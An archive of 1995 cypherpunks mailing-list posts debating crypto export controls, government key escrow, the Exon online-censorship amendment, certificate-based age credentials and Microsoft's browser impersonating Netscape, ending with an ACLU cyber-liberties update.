and they may not always provide 7x24 access (or may charge extra for it,
as well as charging for their lawyer's review of the warrant.)
Or the escrow agents may be multinationals that store their files off-shore.
Or the SECRET cleared escrow employee may have quit, making it more difficult
to handle classified requests.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Dec 95 15:35:19 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <199512062336.PAA13979@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>1.  Write a program with limited encryption (40 bit?), with the encryption
>>>module in a file external to the  main program.
>>>2.  Get export approval for this program.
>>>3.  Write a module which replaces the encryption file, increasing key size
>>>to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit
>>>PGP, etc.)
>>>4.  Ship that new module with the old software to US customers.
>>>Naturally, that new module will "leak," so anybody who buys the old

Tim May replied
>>"Crypto hooks," basically the scheme you are proposing, were thought of by
>>the authorities and are not a bypass of the crypto export laws.

I had interpreted the suggestion differently - rather than a system with 
user-accessible crypto hooks, the manufacturer could ship a binary patch
upgrade for US customers to install.  The internal design would presumably
have crypto hooks (i.e. subroutine calls); they can't ban that.

Of course, if you follow this strategy, get export approval for version 1.0,
and ship the US-only patch as 1.1, getting export approval for version 2.0
may be a shade more difficult...
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Dec 95 15:35:34 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <199512062336.PAA14035@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:11 AM 12/6/95 -0400, pfarrell@netcom.com wrote:
>They claimed it was needed so that they can serve a court order
>that is SECRET. ....
>The main area that they claimed was for FISA orders. 

Maybe this is just an artifact of Pat's wording, but this sounds
like there may be classified court orders other than FISA?

> Plus, since you have to be a US citizen to get a clearence, 
> how can there be approved foreign escrow agents?

By deals with the foreign governments, presumably reciprocal.
The US would allow export of software using the escrow keys for
Banque du Commerce et Credit Internationale - Paris, if the
bank and the French spooks signed an agreement for escrow access,
and in return the US would probably agree to give the French 
access to some US-escrowed keys (with proper requests, of course.)

>And the usual, why in hell would a competent spy use
>crypto escrowed in the US?

Competent spies appear to be a surprisingly small fraction of
even government-employed espionage personnel, or maybe long-term
espionage is just inherently difficult the Soviet Empire,
Nazi Germany, and WWII Britain had all identified most of the spy
rings operating against them.  Philip Agee's article on how to
identify the CIA agents in a US embassy may have surprised the CIA,
but wouldn't have given any significant new information to the KGB.
(They might have been surprised he'd _say_ it...)
And amateurs and newcomers to the business aren't always that good.

Also, maybe a spy would be using GAKed crypto to avoid attracting
attention.  Much of espionage, especially emerging economic espionage,
primarily uses open-source information; there's nothing too secret
about sending the latest SAIC want-ads from EE Times back home,
but the CIA may learn what targets you're watching by watching
enough of your traffic to guess at your filtering criteria.

And sometimes you're just stuck on the Beltway and have to use your
car phone to say you'll be a bit late dropping off the secret plans.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Dec 95 15:35:37 PST
To: cypherpunks@toad.com
Subject: Re: Secret Clearance (was: re: NIST GAK export meeting, sv)
Message-ID: <199512062336.PAA14064@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:00 PM 12/5/95 -0500, Pete Loshin <pete@loshin.com> wrote:
>The point is, if you want to keep your organization's systems secure,
>you need some mechanism to do so. Security clearance is one way;
>banks and other financial institutions do other things (like finger prints,
>background checks, etc.)
...
>My big question is, do any of the companies providing Internet services,
>or Internet software, or digital commerce services/software, employ
>any of these security mechanisms on their employees? 

Few, if any, other than companies already in the military business;
secret clearances are _expensive_, usually take a long time to get,
and the military only gives them to people who need them.  Normally,
to get clearances for your employees, you need to have a security
bureaucracy to also get clearance for handling classified material
in your building, though perhaps they'd make other arrangements
so the cleared escrow agent could take the master keys down to
the local FBI office to unlock somebody's correspondence.

Commercial companies are more likely to use bonding services to
insure themselves against employee theft, though they also
do things like talking to previous employers, and for sensitive
positions some companies check criminal records.  Many companies
will run a TRW-or-equivalent credit check on applicants to
see if there are major outstanding problems (though somehow the
Mafia seldom reports bad gambling debts to TRW :-), and some
companies pretend they're doing drug tests to check for
people with expensive habits.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Date: Wed, 6 Dec 95 12:38:15 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: PGP
In-Reply-To: <Pine.LNX.3.91.951206130026.23641B-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.SOL.3.91.951206152752.14984D-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain


> you really ought to be more thoughtful about what and how you write on 
> the cypherpunks list...


    The how is referring to not double spacing isn't it.  Sorry,

I've been up for the last couple of days and didn't even realize it.

What do you mean what I write about?   


> 
> anyway,  the PGP code from MIT should compile on nearly all unix 
> machines.  i'm not sure it will compile with a g++ compiler though.  all 
> unix type machines should have uncompress, tar, (g)cc.  just get the 
> source from MIT.


      I am not an idiot.  I must have downloaded PGP from about 20 million

different places.  They are all either missing files, some times the

darn code won't compile, or when I "tar xvf" half of the files bring

up an error and the computer says it can not create the file.  I'll try

the address that you've sent.  Hopefully I will have better luck. 

      In the persuit of constructing a stable cryptographic program

that uses PGP what features should be included.  Obviously all of

the ones that PGP has and encrypting/decrypting e-mail but what else?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 14:24:36 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <aceb57071f0210045a46@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This is a VERY positive idea!

At 3:54 PM 12/6/95, Peter Trei wrote:

>Actually, I've been thinking about this quite a bit recently. I'm building
>an SSL enabled server, and clent-side authentication may provide
>some help. I could see a user getting his or her public key certificate
>signed with different CA keys which assert any number of conditions,
>such as:
>
>Key holder was born before (some particular date).
>Key holder has access to sales data for XYZ corp.
>Key holder is an adult who takes the first amendment seriously.
>
>... and the server would recognize different CA signatures as permitting
>different levels of access.

This is something that could get two things done:

1. Protect ISPs and Web sites from claims they aren't taking any steps to
block children. (I won't get into the "children should be allowed to
appreciate the beauty of the human body" issue, just noting that an ISP or
Web site could deny access to account holders under 18, or over 30, or
whatever he wants to do.)

2. Get wider currency for the concept of digitally signed credentials,
especially if these are _blinded credentials_, where the credential is for
an age, say, and not an identity. (Standard Chaumian stuff, though likely
to be nontrivial to implement.)

>If your browser permitted you to select the key certificate  used in
>setting up the encrypted link (and different certs or sets of certs
>could be protected with different passphrases), then Mom or Dad
>could use their I-am-an-adult credential to read www.xxx.com,
>while Junior could not. There *is* a loss of anonymity in this scheme,
>however.

There may be ways around the loss of anonymity. Ideally, with blinded
credentials, But in the short term, through Web proxies and/or servers.

For example, Sameer's c2.org could issue accounts to people who can prove
they are over 18 (notarized copies of birth certif., passport, etc.).
Sameer's system would then have a credential saying "this account name is
over 18."

(There is of course little that can be done about people who lend their
accounts to minors, absent any effective biometric security measures. No
current system, certainly not Exon-Coates, can deal with this.)

>I realize that digital credentials are old hat on this list. The point I am
>making is that the pieces for doing this are here - we just need to
>assemble them.
>
>(This is not to suggest that I am in favor of Exon/Coates in any way -
>I am not. )

I think this could be quite a good project, provided it is not trying to be
all things to all people.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 6 Dec 95 12:46:51 PST
To: Richard Charles Graves <llurch@networking.stanford.edu>
Subject: Re: Note on "Barring Netscape"
In-Reply-To: <199512061957.LAA05418@Networking.Stanford.EDU>
Message-ID: <9512061547.ZM8340@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Dec 6, 11:57am, Richard Charles Graves wrote:
> The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22
(compatible"
> to hte server, which triggers an incorrect response from, e.g., www.c2.org.
> This little fraud has the potential to make you look silly if left
unexplained.

this *is* fraud, in a way. Microsoft is shipping a product which in a
certain exchange claims to be a product of another company. Microsoft's
software is being treated better around the net because it is recognised
as Netscape, which it isn't.

It would be somewhat like me walking through the short line at Heathrow
as a EU citizen even though I'm actually a Canadian citizen.

If Microsoft had used "MSIE 1.0 (...)", then they would have to gain
"market share" in convincing the web that their browser is worth writing
content for. As a side note, there are suggestions that httpds should be
a little more intelligent about HTML, recognising which clients can handle
which versions of html [so that they would ship 1.0 to those which can
handle 1.0, 2.0 to those which think they can handle 2.0, and perhaps we
have a 2.0-netscape-ENHANCED-ha-ha-ha]. If this were to be encouraged by
both httpd creators and client creators, with both sides being honest,
then uSoft would not need to claim to be shipping Netscape. They could
just say html-2.0-microsoft-ENHANCED-ow-my-sides [e.g.] and servers could
check the 2.0 and pay attention to the rest if they wished. [On a side
note, if all governments decided to close up shop tomorrow, many people
on this list would be happy. Which is more likely?]

http, from my meagre understanding, is supposed to be a negotiation (among
other things) with both sides agreeing on what the client can handle and
what the server can offer. Perhaps Microsoft could be encouraged to be
honest about what they are shipping. (I don't doubt that other clients
may also lie about who they are.)

richard

ps - Life might be a lot easier for everyone on the web if Netscape forced
     uSoft software to be honest about what it is.

ObBarelyCrypto: Do our *browsers* now have to start authenticating themselves?

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMYBVB1gtCYLvIJ1AQEi3gP+IqWbKqk6MTKviGMRw5ZKde+9BQ/iQOIA
jrrDXEZQIdwHBeeATOzqYFVzVxi5bQFgLPCt/kNTsyARwQbLGQ54HuR57qPX4EOm
d0d2A7oL4qsFwGvmETP4HlBQy10e5vKqM/7pLZl0s9cE/a3kWeZq+XCS4oBKHDtF
alTjxYClsAg=
=hOc9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Wed, 6 Dec 95 12:46:54 PST
To: "cypherpunks@toad.com>
Subject: Inherent Insecurity of Internet Commerce! (was RE: Secret Clearance)
Message-ID: <01BAC3F2.3D4F0240@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


OK, I'll try again. First, as I recall, SECRET clearance 
is actually not very high: when I got it, I had to answer 
a bunch of questions (do you abuse illegal drugs? are 
you now or have you ever been a member of any 
organizations? have you ever been _arrested_ for anything?) 
and fill out some forms and get fingerprinted. They 
probably did a credit check, and that was about it. 
Nobody I knew got any calls asking about my habits 
(that is reserved for higher clearances).

So now I'll rename the thread again: "Inherent Insecurity 
of Internet Commerce" -- <sarcasm>maybe now the NYT 
will feature me on the front page for "discovering" this
inherent flaw in the Internet.</sarcasm>

My purpose in renaming the thread in the first place 
was to start another thread relating to the types of 
security in places like, say, Netscape or Spyglass 
or CyberCash or First Virtual or Interramp or any 
other ISP or software company. Because I want to 
know how susceptible these companies are to hiring 
the wrong people.

So, here's the "bug": if some agency of crime/espionage 
wants to subvert any of these systems, all they need 
do is employ the same blackmail/bribe techniques 
used to recruit actual spies on some employees of 
these companies. They then slip in some hacked 
versions of the software with the good ones, or modify 
distribution servers, or slip code into servers that 
forwards every tenth credit card number somewhere.

Or how about getting a janitor to plug a wireless tap 
into one of the major Internet backbones to sniff for 
cc#s as well as interesting e-mail?

Also, since there's enough noise here already (and 
even I don't see that much crypto-relevance) I won't 
post again on this topic, but I am very interested in 
hearing concrete examples of how Internet companies 
are protecting themselves, and also in hearing about 
specific instances of security failing (e.g., has anyone 
ever found a tap on a backbone?)

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 6 Dec 95 12:40:55 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <9512062040.AA20810@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> (Controlling Web page accesses is a much tougher problem, of course. so I
> wouldn't expect much action on this at first.)
> 
> By the way, I recently discovered a new twist on "age credentials": the use
> of credit cards to prove age. One image site is asking for a "valid credit
> card number" to be given...not to use for charges, but just to do a quick
> verification (they claim a few minutes or less) that the card is valid and
> in the name of the person accessing their site.
> Timothy C. May              | Crypto Anarchy: encryption, digital money,

Actually, I've been thinking about this quite a bit recently. I'm building
an SSL enabled server, and clent-side authentication may provide
some help. I could see a user getting his or her public key certificate
signed with different CA keys which assert any number of conditions,
such as:

Key holder was born before (some particular date).
Key holder has access to sales data for XYZ corp.
Key holder is an adult who takes the first amendment seriously.

... and the server would recognize different CA signatures as permitting
different levels of access.

If your browser permitted you to select the key certificate  used in 
setting up the encrypted link (and different certs or sets of certs
could be protected with different passphrases), then Mom or Dad
could use their I-am-an-adult credential to read www.xxx.com,
while Junior could not. There *is* a loss of anonymity in this scheme,
however.

I realize that digital credentials are old hat on this list. The point I am
making is that the pieces for doing this are here - we just need to
assemble them.

(This is not to suggest that I am in favor of Exon/Coates in any way -
I am not. )

Speaking for myself alone....





   

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kevin S. Van Horn" <vanhorn@hks.net>
Date: Wed, 6 Dec 95 12:49:17 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <199512062048.PAA15070@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@got.net (Timothy C. May) wrote:
>
>I just heard (12:15 EST) that the House has adopted language similar to the
>original Exon-Coates language in the Senate

I consider it unlikely in the extreme that this passed without Gingrich's
sanction.  So I guess the Newt's much-publicized opposition to the Exon
amendment was just a show.

- ---------------------------------------------------------------------------
Kevin S. Van Horn | Uncle Sam needs YOU!
vanhorn@atext.com | But not vice versa.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMYBmCoZzwIn1bdtAQE9lwGA1w4SUuzkxqcrIWu2EJq65rspqg7PVL6Y
FcMbibELAnFrZOUKNVtQNXxtpfaItIGR
=QI3W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 6 Dec 95 13:18:46 PST
To: jimbell@pacifier.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <9512062117.AA00306@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


You would not be allowed to export a browser where the crypto library is
a dynamically-loaded library.

If you wrote a "browser toolkit", you would have to take special care to
hide even the names of the crypto functions in the library symbol table.

If you want to do offshore crypto development, your best bet is to document
the required interfaces and protocols in a publication which is available to
anyone, as this is supposedly protected by the First Amendment.

On the other hand, I encourage you to try to do otherwise.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 6 Dec 95 13:22:47 PST
To: cypherpunks@toad.com
Subject: Kim Philby in Washington
Message-ID: <199512062123.QAA25167@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


         Burgess, Philby, and Maclean in Washington 
                  A Comment on Clipper and G.A.K. 
 
It is historically indisputable that Guy Burgess, Harold "Kim" 
Philby, and Donald Maclean were agents for Soviet intelligence. 
 
What is far less known is the role that these three individuals 
played in the U.S.A. and how this related to their access to U.S. 
secret material. 
 
Maclean, at one time, was the Head of Chancery of the British 
Embassy in Washington D.C. As such, he was the head of the code 
room at the Embassy and thus had access to *all* encrypted traffic 
passing through the Embassy. This included everything available 
through the considerable Anglo-U.S. co-operative ventures during 
the immediately-post W.W. II period. 
 
Guy Burgess was also assigned to the British Embassy where one job 
was as a liaison agent with the U.S.A. It has been reported during 
this period that he had a pass from the Atomic Energy Commission 
that gave him 24-hour-a-day access unaccompanied by any U.S. 
"overseer." This was a higher level of A.E.C. security than held 
by J. Edgar Hoover at the time. 
 
Kim Philby was the U.K.'s liaison to the Central Intelligence 
Agency. He was personally close ("a drinking buddy") to then head 
of C.I.A. Counter-Intelligence James Jesus Angleton. 
 
Angleton was, to all accounts, a psychopathologically paranoid 
individual, seeing Soviet spies and disinformation attempts in 
almost all areas of life with the exception of his one-time bar 
companion. He might be likened to one of those hysterical 
Victorian "feminists" who thought "all men are pigs" with the 
exception of one real gentleman she knew. (The gentleman would, of 
course, be Jack the Ripper.) 
 
I write this not out of any sense that Key Escrow or Clipper are 
"communist plots." Far from it, especially during this period. 
 
But the presence of Burgess, Philby, and Maclean in Washington 
shows how unable the governments have been to protect their own 
secrets. It is unreasonable to suggest -- as do supporters of 
Clipper and G.A.K. -- that governments will be any better 
protecting ours. 
 
--tallpaul 
      
      





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 6 Dec 95 14:28:05 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <aceb2a8d1b021004e6f8@[205.199.118.202]>
Message-ID: <199512062229.RAA16714@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>Yes, I read your proposal. The "hooks" term is not my coinage, but refers
>to this general idea. I urge you to read what others, including companies,
>have had to say on this matter. Much of the debate on "interoperability"
>revolves around details of entry points to crypto modules and such hooks.
>
>No point in arguing with Jim on this anymore, so I won't.

I agree.  It does bring to mind an idea, though.  Netscape builds an
exportable system by choosing a random 128 bit number and then just
including 88 bits of it in plaintext.

This means one of two things.  Either there's a field which holds the
"key", but the export version stores 88 bits plain + 40 bits cipher,
and knows this structure, or there's a field which holds the 128 bit
enciphered key, and a second field which holds the 88 bits of plaintext
key.

In the latter case, a patch which modifies the code which stores the
88 bit plaintext field to write all zeros would be almost trivial.
Just over-write the store instructions with noops, most likely.

In the former, the patch would be more significant, but still possible.
You'd disable the "write the plain" part and extend the "decode the
cipher" part to decode all 128 bits --- probably just a loop test.

Either patch for a given system should require less than a page of
explanation.

I wonder how the ITAR would view this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 6 Dec 95 14:35:02 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <m0tNR0t-00093sC@pacifier.com>
Message-ID: <9512062236.AA01307@alpha>
MIME-Version: 1.0
Content-Type: text/plain



jim bell writes, carefully avoiding the "Return" key:
 > 1.  Write a program limited to keysize ...
 > 2.  Get it export approved.  Export it.

If you do step 1, then step 2 is impossible.  If your application is
constructed such that a non-export-approvable cryptosystem can be
dropped on top, then you will not get export approval.  (I know this
from our direct experience here.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rogaski@phobos.lib.iup.edu (Mark Rogaski)
Date: Wed, 6 Dec 95 13:41:41 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: SKIP
Message-ID: <9512062140.AA14601@phobos.lib.iup.edu.>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can anyone remember the URL for SKIP for Solaris, that little piece
of paper has become a victim of the clutter ...

- -----
Mark Rogaski           100,000 lemmings     rogaski@phobos.lib.iup.edu 
aka Doc, wendigo        can't be wrong!     http://www.lib.iup.edu/~rogaski/

VMS is as secure as a poodle encased in a block of lucite 
						... about as useful, too.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMYNYx0c4/pqJauBAQHPFwQAoG6wtJJsq9QJB2MU02G08Vo436jK0sZs
XscSvlpKUtYbyJORj4ETVdfDAAoyQdjZFQQTeH4vt413DPbmqgwKs+QnBrI49evv
UjhmcGvxFMj8DpkxiL+5ANu6nrzLWM9smUDWlpKTa3HN59Kq5shlHIlp+yo6AH08
AIInsCZh+YU=
=jUrp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 6 Dec 95 15:29:40 PST
To: cypherpunks@toad.com
Subject: Re: Note on "Barring Netscape"
In-Reply-To: <9512061547.ZM8340@glacius.alias.com>
Message-ID: <yJJPFD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Richard Martin" <rmartin@aw.sgi.com> writes:
> On Dec 6, 11:57am, Richard Charles Graves wrote:
> > The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22
> (compatible"
> > to hte server, which triggers an incorrect response from, e.g., www.c2.org.
> > This little fraud has the potential to make you look silly if left
> unexplained.
>
> this *is* fraud, in a way. Microsoft is shipping a product which in a
> certain exchange claims to be a product of another company. Microsoft's
> software is being treated better around the net because it is recognised
> as Netscape, which it isn't.

This reminds me of how many many years ago, when IBM and Microsoft were
good friends, earlier version of MS Windows(?) video drivers were
hard-coded not to recognize a video card as being VGA-compatible (or
even EGA-?) unless its ROM had the 3 letters "IBM" at offset 0x1e. The
genuine vanilla IBM card had the words "COPYRIGHT IBM" at that address.
Various clone makers had to put "IBM" at that location to make their
cards work with Windows(?). E.g., I have a Trident VGA card whose ROM
says "RESERVED FOR IBM COMPATIBILITY" positioned so that "IBM" is
exactly at 0x1E. Some other cards just say "IBM" there with no
explanation in adjascent memory.

I think that if some servers refuse to talk to clients unless they see
"Mozilla", then I can't blame Microsoft for impersonating Netscape.

I think the whole protocol is way stupid. Instead of asking the client
for its name, and then looking up in some database what a client with
that name is capable of, a server should ask the client only about the
capabilities that the server is planning to use.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 6 Dec 95 13:44:16 PST
To: cypherpunks@toad.com
Subject: Re: GAK
In-Reply-To: <6615943A01502C79@-SMF->
Message-ID: <Pine.LNX.3.91.951206163331.201A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 6 Dec 1995, Scott Binkley wrote:

> I heard a while back about being able to "split" up a PGP key.  What 
> about
> splitting up the key into many parts, and giving them out to multiple 
> INDEPENDANT
> agencies.  ie: One piece goes to the FBI, one to the NSA, one to some 
> other committee, and
> so on.  That way, no goverment body could just tap your conversations 
> without getting
> approval from others, and gaining the pieces of your key.
> 
> just a thought
> 
> 

This is exactly how the clipper works.  The unit key is XORed with 160
random bits, the result is given to one government agency, and the random
bits are given to another agency.
 
The largest concern I have about wiretapping is not so much that some corrupt
law enforcement agents will wiretap me out of malice, but that if I communicate
with someone who is being wiretapped, my end of the conversation will be heard
as well.  I might be giving out sensitive information to some government
agent without ever violating any laws and without any reason for the government
to believe that I was a criminal.  For this reason, I believe that cryptography
should not be regulated.  I would never trust the government with any of my
decryption keys.

finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key info: 0xF9B22BA5 bd24d08e3cbb53472054fa56002258d5
- -----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
- ------END GEEK CODE BLOCK------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMYO4rZc+sv5siulAQHsDAP/dWDLQouo5dx7kZp4wTOFJGB1v3T6Pi8v
FuAr7+k1ZfYDeD4J8+Hehrrm8JrPv0MBT9Bg8y560PSt9+9E8rShngH3p2ldYv8q
7XDX81bwJY5wrqweE97duQKmH3l0jTXb/7UMi+R7ESOCmLBhywhDCOO0SRlc3NIQ
xK5ty/F90YI=
=aQX+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Wed, 6 Dec 95 14:42:44 PST
To: Jason Burrell <cypherpunks@toad.com
Subject: Responding to Exon -- technology is not enough
Message-ID: <v01530501acebcc1c5522@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


Jason Burrell <jburrell@crl.com> writes:

>*Sigh*. Are we really ready to go back to UUCP? It looks like we'll have
>to. That is, if someone doesn't set up a couple cryptographically enhanced
>subnets first, or come up with some better idea. Interesting prospect,
>actually.

Fine for the tiny subset of Net users who understand crypto enough to use
it on a daily basis. I'm not one of people either. This crypto isn't user
friendly stuff. Before you propose such as solution, better make sure
people can use this stuff.

>Anyone wish to comment on the prospect of a double blind server, set
>outside U.S. borders, that can act as an interface to the rest of the
>world, perhaps encrypting or stego'ing the data transfered between it and
>the user? Basically, an anonymous remailer that acts as a cross between
>an NNTP, POP3, and SMTP servers.

How are you going to pitch this technology to all the people with AOL and
Microsoft Network accounts who barely understand the net? These are the
people who need exposure to all the uncensored expression they can get.

Instead of figuring out how to build a new treehouse that excludes Exon and
Hyde, how about fighting the damned bill in the courts?

bill.humphries@msn.fullfeed.com | WisCon 20: Two Decades of Feminism & SF
http://www.cs.wisc.edu/wiscon/  | Ursula K. Le Guin: Guest of Honor






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Wed, 6 Dec 95 19:19:18 PST
To: ACLUNATL@aol.com
Subject: ACLU Cyber-Liberties Update: 12/6/95
Message-ID: <951206165626_46587199@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------
December 6, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
----------------------------------------------------------------
IN THIS ISSUE:

*    ACLU Announces Plans to Challenge Online Censorship Provisions in Court;
Says That House Conference Vote Leaves No Other Options

*     AOL Censors Gay Video Titles, Finds "Buns" Acceptable but "Studs" Too
Sleazy

*     ACLU Speaks on Cyber-Liberties

----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
----------------------------------------------------------------
*    ACLU Announces Plans to Challenge Online Censorship Provisions in
Court;Says That House Conference Vote Leaves No Other Options

FOR IMMEDIATE RELEASE
Contact: Phil Gutis  202-675-2312

WASHINGTON -- Saying that it could not depend on Congress to protect free
speech on the Internet, the American Civil Liberties Union said today that it
would challenge in court any of the online censorship proposals now being
considered by a House-Senate conference committee. 

In a vote today, the House members of the Congressional conference committee
on the telecommunications bill betrayed their chamber's earlier vote to
reject censorship on the Internet.

"All of Congress's proposals violate the First Amendment and privacy rights
of adults to communicate freely in the online environment," said Barry
Steinhardt, ACLU Associate Director. "Congress is making it ever more clear
that we will have to turn to the courts to uphold free speech in the
promising new medium of cyberspace."  

The ACLU rejected as unconstitutional the proposals offered by Senator J.
James Exon, D-Nebraska, Senator Charles E. Grassley, R-Iowa, and
Representative Henry Hyde, R-Illinois, as well as the one offered by
Representative Rick White, R-Washington.

The House conferees voted today on how to respond to the Senate's provisions
on Internet censorship. Although they first adopted the White censorship
proposal -- which the media widely and inaccurately portrayed as a compromise
-- they then amended it to include the Senate's standard for censorship.

